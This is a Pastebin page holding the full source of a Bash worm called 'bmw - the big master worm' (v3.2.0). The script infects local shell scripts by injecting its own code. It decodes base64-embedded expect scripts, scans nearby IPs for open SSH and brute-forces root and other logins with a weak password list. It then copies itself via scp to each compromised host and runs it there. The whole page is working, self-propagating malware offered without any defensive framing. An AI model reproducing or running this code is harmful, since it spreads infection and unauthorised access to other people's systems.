FlyFar

bmw worm v3.2.0

Feb 26th, 2023
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 5.85 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2. #
  3. # bmw - the big master worm
  4. #
  5. # v320  by wzt  2019
  6. #
  7.  
  8. # bmw_phase1_start
  9. infect_dir="/tmp"
  10. infect_size=10
  11. infect_line=4
  12. infect_max_num=4
  13. infect_num=0
  14. infect_func_num=2
  15. infect_self_num=5
  16. infect_self_name=""
  17. infect_key_words="the big master worm."
  18.  
  19. bmw_find_scripts()
  20. {
  21.     local file file_sz func_num
  22.  
  23.     for file in `find $infect_dir -name "*.sh"`
  24.     do
  25.         [ $infect_num -gt $infect_max_num ] && break
  26.  
  27.         file_sz=`wc -c $file |awk '{print $1}'`
  28.         file_line=`wc -l $file |awk '{print $1}'`
  29.  
  30.         [[ $file_sz -lt $infect_size || $file_line -lt $infect_line ]] && continue
  31.  
  32.         func_num=`grep '^[a-zA-Z0-9_][^"]*()' $file|wc -l`
  33.         [ $func_num -lt $infect_func_num ] && continue
  34.  
  35.         if grep "$infect_key_words" $file >/dev/null; then
  36.             echo "$file has been infected."
  37.             continue
  38.         fi
  39.         echo "<$file_sz $file_line $func_num> infecting $file..."
  40.         bmw_infect_file $1 $file $func_num
  41.         ((infect_num++))
  42.     done
  43. }
  44. # bmw_phase1_end
  45.  
  46. # bmw_phase2_start
  47. bmw_infect_file()
  48. {
  49.     local rand_num i j k l
  50.     local phase_s phase_e
  51.  
  52.     rand_num=$((RANDOM%$3))
  53.     if [ $rand_num -eq 0 ]; then
  54.         rand_num=1
  55.     fi
  56.  
  57.     echo "$3 => $rand_num $2"
  58.  
  59.     phase_s="bmw_phase1_start"
  60.     phase_e="bmw_phase$infect_self_num""_end"
  61.  
  62.     bmw_extract_body "$1" "$phase_s" "$phase_e" "$2" $rand_num
  63. }
  64.  
  65. bmw_extract_body()
  66. {
  67.     local shellcode newcode
  68.  
  69.         shellcode=`awk -v phase_start="$2" -v phase_end="$3" 'BEGIN {phase_flag=0;phase_len=0}{if (phase_flag == 1) {phase_array[phase_len]=$0;phase_len++}if ($0 ~ phase_start) {phase_flag=1;phase_array[phase_len]=$0;phase_len++}if ($0 ~ phase_end) {phase_flag=0;}}END {for (i = 0; i < phase_len; i++) print phase_array[i]}' $1`
  70.  
  71.     shellcode1=$(echo "$shellcode"|sed 's/\\/\\\\/g')
  72.     newcode=`awk -v scode="$shellcode1" -v tnum="$5" 'BEGIN {func_flag=0;func_num=0}{if (func_flag == 1) {print $0; if ($0 ~ /^\}/) {func_flag=0;print scode}}else {if ($0 ~ /^[[:alnum:]].*\(\)/) {func_num++;if (func_num == tnum) {func_flag=1;}}print $0}}' $4`
  73.  
  74.     echo -e "$newcode"|sed 's/\\/\\\\/g' >$4.bak
  75.     rm -f $4 && mv $4.bak $4
  76.     chmod +x $4
  77. }
  78. # bmw_phase2_end
  79.  
  80. scp_crack_exp="IyEvdXNyL2Jpbi9leHBlY3QKCnNldCBJUCBbbGluZGV4ICRhcmd2IDJdCnNldCBVU0VSIFtsaW5k
  81. ZXggJGFyZ3YgMV0Kc2V0IFBBU1NXRCBbbGluZGV4ICRhcmd2IDVdCnNldCBMT0NBTF9GSUxFIFts
  82. aW5kZXggJGFyZ3YgMF0Kc2V0IFRJTUVPVVQgW2xpbmRleCAkYXJndiA0XQpzZXQgdGltZW91dCBb
  83. bGluZGV4ICRhcmd2IDRdCnNldCBSRU1PVEVfUEFUSCBbbGluZGV4ICRhcmd2IDNdCgpzcGF3biBz
  84. Y3AgLW8gU2VydmVyQWxpdmVJbnRlcnZhbD0kVElNRU9VVCAtbyBDb25uZWN0VGltZW91dD0kVElN
  85. RU9VVCAgJExPQ0FMX0ZJTEUgJFVTRVJAJElQOiRSRU1PVEVfUEFUSApleHBlY3QgewoJIih5ZXMv
  86. bm8pIiB7IHNlbmQgInllc1xyIjsgZXhwX2NvbnRpbnVlIH0KCSIqYXNzd29yZDoiIHsgc2VuZCAi
  87. JFBBU1NXRFxyIiB9CgkiUGFzc3dvcmQgZm9yIiB7IHNlbmQgIiRQQVNTV0RcciIgfQoJIk5hbWUg
  88. b3Igc2VydmljZSBub3Qga25vd24iIHsgZXhpdCAxfQoJIk5vIHJvdXRlIHRvIGhvc3QiIHsgZXhp
  89. dCAyIH0KCSJDb25uZWN0aW9uIHJlZnVzZWQiIHsgZXhpdCA5IH0KCSJMYXN0IGxvZ2luOiIgeyBl
  90. eGl0IDN9Cgl0aW1lb3V0IHsgZXhpdCA0IH0KCWVvZiB7IGV4aXQgMCB9Cn0KCmV4cGVjdCB7CiAg
  91. ICAgICAgIiphc3N3b3JkOiIgeyBleGl0IDUgfQoJIlBhc3N3b3JkIGZvciIgeyBleGl0IDggfQog
  92. ICAgICAgIGVvZiB7IGV4aXQgMCB9Cn0K"
  93.  
  94. ssh_crack_exp="IyEvdXNyL2Jpbi9leHBlY3QKCnNldCBJUCBbbGluZGV4ICRhcmd2IDBdCnNldCBVU0VSIFtsaW5k
  95. ZXggJGFyZ3YgMV0Kc2V0IFBBU1NXRCBbbGluZGV4ICRhcmd2IDJdCnNldCBDTUQgW2xpbmRleCAk
  96. YXJndiAzXQpzZXQgVElNRU9VVCBbbGluZGV4ICRhcmd2IDRdCnNldCB0aW1lb3V0IFtsaW5kZXgg
  97. JGFyZ3YgNF0KCnNwYXduIC1ub2VjaG8gc3NoIC1vIFNlcnZlckFsaXZlSW50ZXJ2YWw9JFRJTUVP
  98. VVQgLW8gQ29ubmVjdFRpbWVvdXQ9JFRJTUVPVVQgLXQgJFVTRVJAJElQICRDTUQKZXhwZWN0IHsK
  99. CSIoeWVzL25vKSIgeyBzZW5kICJ5ZXNcciI7IGV4cF9jb250aW51ZSB9CgkiKmFzc3dvcmQ6IiB7
  100. IHNlbmQgIiRQQVNTV0RcciIgfQoJIlBhc3N3b3JkIGZvciIgeyBzZW5kICIkUEFTU1dEXHIiIH0K
  101. CSJOYW1lIG9yIHNlcnZpY2Ugbm90IGtub3duIiB7IGV4aXQgMX0KCSJObyByb3V0ZSB0byBob3N0
  102. IiB7IGV4aXQgMiB9CgkiQ29ubmVjdGlvbiByZWZ1c2VkIiB7IGV4aXQgOSB9CgkiQ29ubmVjdGlv
  103. biByZXNldCBieSBwZWVyIiB7ZXhpdCA5fQoJdGltZW91dCB7IGV4aXQgNCB9Cgllb2YgeyBleGl0
  104. IDEwIH0KfQoKZXhwZWN0IHsKICAgICAgICAiKmFzc3dvcmQ6IiB7IGV4aXQgNSB9CgkiUGFzc3dv
  105. cmQgZm9yIiB7IGV4aXQgOCB9CiAgICAgICAgInVpZD0iIHsgZXhpdCAxMDAgfQoJIipdJCIgeyBl
  106. eGl0IDEwMCB9CgkiKl0jIiB7IGV4aXQgMTAwIH0KCSIqJCIgeyBleGl0IDEwMCB9CgkiKiMiIHsg
  107. ZXhpdCAxMDAgfQoJIkxhc3QgbG9naW46IiB7IGV4aXQgMTAwIH0KICAgICAgICBlb2YgeyBleGl0
  108. IDcgfQp9Cg=="
  109.  
  110. ssh_crack_user=("root" "wzt")
  111. ssh_crack_passwd=("123456" "111" "giveshell" "afafa" "afafdfafdf")
  112.  
  113. bmw_ssh_copy_file()
  114. {
  115.     ./scp_crack.exp $2 $user $1 "/tmp" 4 $passwd
  116.     [ $? -ne 0 ] && return
  117.     ./ssh_crack.exp $1 $user $passwd "cd /tmp;$2" 4
  118. }
  119.  
  120. bmw_ssh_crack()
  121. {
  122.     local user passwd ret
  123.  
  124.     for user in ${ssh_crack_user[*]}
  125.     do
  126.         for passwd in ${ssh_crack_passwd[*]}
  127.         do
  128.             ./ssh_crack.exp $1 $user $passwd "" 4
  129.             ret=$?
  130.             echo -e "\nretcode: $ret\n"
  131.             if [ $ret -eq 100 ]; then
  132.                 echo -ne "\ttrying $user => $passwd\t[success]\n"
  133.                 bmw_ssh_copy_file $1 $2 $user $passwd
  134.                 return
  135.             elif [ $ret -eq 9 ]; then
  136.                 break;
  137.             else
  138.                 echo -ne "\ttrying $user => $passwd\t[failed]\r"
  139.             fi
  140.         done
  141.     done
  142. }
  143.  
  144. bmw_crack_init()
  145. {
  146.     local bin old_ifs flag=0
  147.  
  148.     old_ifs=$IFS; IFS=':'
  149.     for bin in $PATH
  150.     do
  151.         [ -f $bin/expect ] && flag=1
  152.     done
  153.     IFS=$old_ifs
  154.  
  155.     [ $flag -ne 1 ] && return 1
  156.  
  157.     echo "$ssh_crack_exp"|base64 -d >ssh_crack.exp
  158.     [ -f ssh_crack.exp ] && chmod +x ssh_crack.exp
  159.  
  160.     echo "$scp_crack_exp"|base64 -d >scp_crack.exp
  161.     [ -f scp_crack.exp ] && chmod +x scp_crack.exp
  162.     return 0
  163. }
  164.  
  165. bmw_infect_net()
  166. {
  167.     local local_ip host ip
  168.  
  169.     local_ip=`env|grep -i SSH_CONNECTION|awk '{print $3}'`
  170.     host=`echo $local_ip|cut -d '.' -f 1-3`
  171.  
  172.     bmw_crack_init
  173.     [ $? -eq 1 ] && return 1
  174.  
  175.     for ((i = 136; i <= 138; i++))
  176.     do
  177.         ip="$host.$i"
  178.         echo -e "ping $ip"
  179.  
  180.         [ "$local_ip" == "$ip" ] && continue
  181.  
  182.         ping -W 1 -c 1 $ip >/dev/null
  183.         [ $? -eq 1 ] && continue
  184.  
  185.         exec 254<> /dev/tcp/$ip/22
  186.         [ $? -ne 0 ] && continue
  187.         echo "$ip port 22 is open."
  188.         exec 254<&-; exec 254>&-
  189.  
  190.         bmw_ssh_crack "$ip" $1
  191.     done
  192.  
  193. }
  194.  
  195. # bmw_phase5_start
  196. #bmw_find_scripts $0
  197. bmw_infect_net $0
  198. # bmw_phase5_end
Tags: BMW
Add Comment
Please, Sign In to add comment